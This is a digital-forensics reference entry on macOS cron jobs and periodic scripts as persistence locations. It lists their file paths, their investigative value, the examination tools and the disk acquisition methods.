Cron Jobs & Periodic Scripts

macosPersistence MechanismsDisk Image

Location

/usr/lib/cron/tabs/ (user crontabs), /etc/crontab, /etc/periodic/ (daily/weekly/monthly)

Description

macOS supports both traditional cron job scheduling via crontab and the periodic system that runs maintenance scripts at daily, weekly, and monthly intervals via launchd. User crontabs are stored in /usr/lib/cron/tabs/ and system-wide tasks in /etc/crontab. The periodic directories contain shell scripts executed by the com.apple.periodic-* LaunchDaemons.

Forensic Value

While LaunchAgents and LaunchDaemons are the dominant macOS scheduling mechanisms, cron jobs remain functional and are used by attackers who are more familiar with Linux persistence techniques. User crontabs in /usr/lib/cron/tabs/ may contain entries that download and execute payloads from external URLs. Scripts added to /etc/periodic/daily/ execute as root once per day and can fly under the radar because administrators expect files in these directories. File modification timestamps and content analysis of periodic scripts identify unauthorized additions.

Tools Required

crontab -lcatfindmac_aptKnockKnock (Objective-See)

Acquisition Methods

External Boot dd Image (Intel Mac)

macos — physical

Target Disk Mode (Intel Mac)

macos — physical

Share Disk (Apple Silicon)

macos — physical

SUMURI Recon ITR Logical Acquisition

macos — logical

Cellebrite Digital Collector (macOS)

macos — logical